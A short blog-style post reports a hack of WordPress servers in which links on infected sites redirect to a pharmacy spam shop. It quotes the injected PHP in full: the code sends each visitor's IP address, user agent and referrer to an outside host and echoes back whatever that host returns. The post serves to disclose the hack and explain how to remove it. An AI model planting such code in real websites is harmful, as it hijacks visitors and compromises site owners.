It’s not what you think. This time we’ve discovered what appears to be an ongoing (looks to date back to before July 2010) server level hack that targeted WordPress sites. What seems to happen is any link on the WordPress-based site is compromised by a redirect request (in this case it went to a Canadian based Viagra shop called MedShop-247.com. (Not running WP by the way)
Here’s the PHP code that was injected into the top of the WordPress core index.php file.
<?php
$url = "http://doc.health-drugshop.com/TDS/request.php?ip=".$_SERVER['REMOTE_ADDR']."&useragent=".urlencode($_SERVER['HTTP_USER_AGENT'])."
&referer=".urlencode($_SERVER["HTTP_REFERER"]);
$answer = file_get_contents($url);
if (strpos($answer,"noredirect") === false) {
echo $answer;
}
?>
Removing this inserted code seems to fix the trick. More care should probably come from the attention of web hosts when they see servers are under attack during “standard” DOS attacks. Things like this can easily sneak in when no one is reviewing the logs. An unfortunately WordPress itself doesn’t notice it – assumedly because the code runs prior to any WordPress code. So again, while WordPress wasn’t to blame here it certainly can feel the pain depending on your server’s security and vigilance of the web host provider.